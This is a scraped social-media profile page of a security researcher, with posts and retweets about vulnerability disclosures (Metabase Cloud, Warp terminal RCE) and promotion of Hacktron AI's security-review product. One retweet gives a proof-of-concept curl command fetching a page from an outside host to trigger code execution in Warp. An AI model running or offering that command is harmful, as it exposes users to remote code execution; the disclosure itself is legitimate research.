Harsh Jaiswal

3.3K posts

Harsh Jaiswal banner
Harsh Jaiswal

Harsh Jaiswal

@rootxharsh

Building @hacktronai | researching at @httpvoid0x2f | auditing at @cure53berlin | prev @zomato @vimeo @pdiscoveryio

Katılım Nisan 2015
1.2K Takip Edilen22.4K Takipçiler
Harsh Jaiswal
Harsh Jaiswal@rootxharsh·
Relatively less CVE's in the latest stable release of Chrome - chromereleases.googleblog.com/2026/07/stable… tho could be because of the VRP program changes? A few more months after which we might see less CVE's, ofc more code is being written with AI so there will be bugs but the CVE rain of all years old bugs should slow down now i assume.
English
1
0
35
5.4K
Harsh Jaiswal retweetledi
s1r1us (mohan)
s1r1us (mohan)@S1r1u5_·
I strongly believe most vulnerabilities never need to reach production if design and PR review are done well, but I don't think any team has the dev-to-security ratio to review every PR and design. Now it's possible with @HacktronAI. It's been reviewing every PR on @RocketChat, and since it's all open source, I can show you proofs, not plain marketing bullshit. 🧵
s1r1us (mohan) tweet media
English
1
5
58
4.4K
Harsh Jaiswal retweetledi
Hacktron AI
Hacktron AI@HacktronAI·
Hacktron x @krispHQ Krisp is deployed on 200M+ devices, processes 80 billion minutes of voice conversations every month, and powers Discord's built-in AI noise suppression. At that scale, security is not just an internal priority. It is critical to Krisp and the customers who rely on them. Like many security teams, Krisp relied on traditional SAST tools, but high alert volumes and false positives made it difficult to separate real risk from noise. As engineering teams began using AI to ship software faster, Krisp needed a way to catch meaningful vulnerabilities earlier in the development process without slowing developers down or changing how teams work. Learn why Krisp partnered with Hacktron to bring an AI-native security workflow to their SDLC. Link below👇
Hacktron AI tweet media
English
1
3
14
4.1K
Harsh Jaiswal retweetledi
Robert Chen
Robert Chen@NotDeGhost·
Anchor is secured by @HacktronAI Thanks to their open source program, all PRs get 24/7 coverage for security issues
Robert Chen tweet media
English
5
8
40
7.4K
Harsh Jaiswal
Harsh Jaiswal@rootxharsh·
People would be surprised how misconfigured an average cloud env is. This is just one of many examples and given how ez RCE is this days with third party dependencies, I highly recommend people to put $ in securing their cloud env, people should follow principle of least privilege whenever possible.
English
0
0
1
61
Harsh Jaiswal retweetledi
Rahul Maini
Rahul Maini@iamnoooob·
New blog: We show how a resurrected H2 INIT allows RCE into Metabase Cloud and taking over any tenant! Read the full write-up: hacktron.ai/blog/metabase-…
Rahul Maini tweet media
English
1
25
93
17.2K
Harsh Jaiswal retweetledi
set
set@setl1n·
hello world! it's been about 1.5 months since i started my internship at Hacktron AI and today being day 50 of my 101 days internship, i wanted to take a moment out of my usual "hunker down, hustle up" mentality to reflect on my experience thus far. velocity velocity velocity - we ship faster than smu groups the week before their final presentation. in the (relatively short) time that i've been here, i've integrated jira (to create tickets directly from hacktron), rewired our github app install flow, and somewhere along the way, also got involved in shipping support for github enterprise server. heck i spent the bulk of today reading SSO documentation and fiddling with Okta (i did at least 20 mfa's) and we'll probably ship it this week. trust, ownership, excellence - holding ourselves to high standards. knowing that the person beside you (virtually) is doing the same. you see it broken? fix it. call it out. you think something can be done better? propose, debate, implement. not many teams have the circumstance, much less the composition, to cultivate this culture but when done right, it feels like an unstoppable force. ai ai ai - we're an ai company (our product is ai) but we're also an ai-native company (problems surface => can we solve this with ai?). the insane shipping speed i spoke about? only possible because our codebase is AI-optimised > context-rich documentation, dedicated testing infrastructure and most importantly, security reviews. shipping speed is inversely proportional to how safe your code is (don't quote me on this) and anyone who has vibe coded knows how vulnerable slop can be. hacktron has surprised me many times both simple low risk bugs that slipped my radar and security vulnerabilities a few stack traces away that i would never have caught. srsly, if you're an company shipping at AI speed (or aiming to), try it, >app.hacktron.ai< , you have nth to lose (free trial). software engineering isn't dead, the value prop of swe's just moved up the stack. ride the wave or get left behind. okay back to my cave
set tweet mediaset tweet media
English
0
3
13
4.3K
0xrudra
0xrudra@0xrudrapratap·
New chapter: i'm at @CertiK now. Been in this space long enough to know which teams actually move the needle. this is one of them. Came for one project — can't say what it is yet. but it's the thing i've wanted to build for years, and there's no team i'd rather build it with. You'll see soon. keep an eye on @CertiK
0xrudra tweet media
English
72
5
195
30.2K
Harsh Jaiswal retweetledi
s1r1us (mohan)
s1r1us (mohan)@S1r1u5_·
TUIs getting stronger only means they’re also making it fun to hack. @warpdotdev terminal RCE by @rootxharsh and @HacktronAI PoC: run this in warp terminal and get pwned. curl htxp://rce.ee/warp-pwn.php Details below:
English
4
4
67
7.4K
Harsh Jaiswal
Harsh Jaiswal@rootxharsh·
RCE in Warp Terminal! I believe the attack surface is broadening with every new tool you use. Every OAuth app you authorise with elevated scopes.. we'd see more breaches via targeting tools/SaaS.. the attack surface is everyone and everything now - hacktron.ai/blog/the-attac…
English
1
13
47
3.9K
Harsh Jaiswal retweetledi
Julio 🏴‍☠️
Julio 🏴‍☠️@juliocfa_·
@S1r1u5_ Really hope more people get to try Hacktron. You guys are doing great so far and I love the open source initiative
English
1
2
6
3.3K
Harsh Jaiswal retweetledi
s1r1us (mohan)
s1r1us (mohan)@S1r1u5_·
won't say its perfect yet, still lot to improve in terms of reducing false positives, but so far good response. if you have open source project, we review for free, apply here: hacktron.ai/open-source if not, try the free trail
s1r1us (mohan) tweet media
English
2
1
24
3.3K
Harsh Jaiswal retweetledi
s1r1us (mohan)
s1r1us (mohan)@S1r1u5_·
So @Doyensec recently published a report comparing @xbow and @AikidoSecurity, two AI pentest platforms. I figured, why not run @HacktronAI on the same test? So I ran a pentest on one of the target. Hacktron cost $350, while XBOW and Aikido cost $4,000 each. We did pretty well!
s1r1us (mohan) tweet media
English
8
20
235
15.4K